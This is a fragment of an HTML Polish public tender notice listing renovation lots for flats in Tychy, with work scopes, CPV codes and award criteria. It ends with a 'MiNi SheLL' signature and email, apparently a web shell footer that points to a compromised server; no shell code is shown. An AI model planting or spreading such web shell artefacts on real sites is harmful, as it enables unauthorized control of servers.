      Szczegółowy zakres robót określa przedmiar robót stanowiący załącznik nr 8 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.43.21.10-8, 45.42.11.32-8, 45.42.11.31-1, 45.26.25.22-6, 45.41.00.00-4, 45.44.21.00-8, 45.33.20.00-3, 45.33.24.00-7, 45.33.30.00-0, 45.31.00.00-3, 45.11.12.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE Nr 3  -  Remont lokalu mieszkalnego ( wolnostanu) w budynku mieszkalnym 
                                   w Tychach, przy ul. Batorego 4a/36.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE Nr 3 : 
     Zakres robót obejmuje m.in.:
      -  roboty murarsko - tynkarskie
      -  wymiana stolarki okiennej i drzwiowej
      -  roboty posadzkarskie
      -  roboty malarskie
      -  wymiana instalacji wodno kanalizacyjnej z wymianą urządzeń sanitarnych
      -  wymiana  instalacji gazowej z wymianą urządzeń,
      -  remont instalacji elektrycznej
      -  roboty porządkowe oraz wywóz i utylizacja gruzu
       oraz wykonanie wszystkich niezbędnych prac, które towarzyszą niniejszemu zamówieniu.

     Szczegółowy zakres robót określają przedmiar robót stanowiący załączniki nr 9 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.43.21.10-8, 45.42.11.32-8, 45.42.11.31-1, 45.26.25.22-6, 45.41.00.00-4, 45.44.21.00-8, 45.33.20.00-3, 45.33.24.00-7, 45.33.30.00-0, 45.31.00.00-3, 45.11.12.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com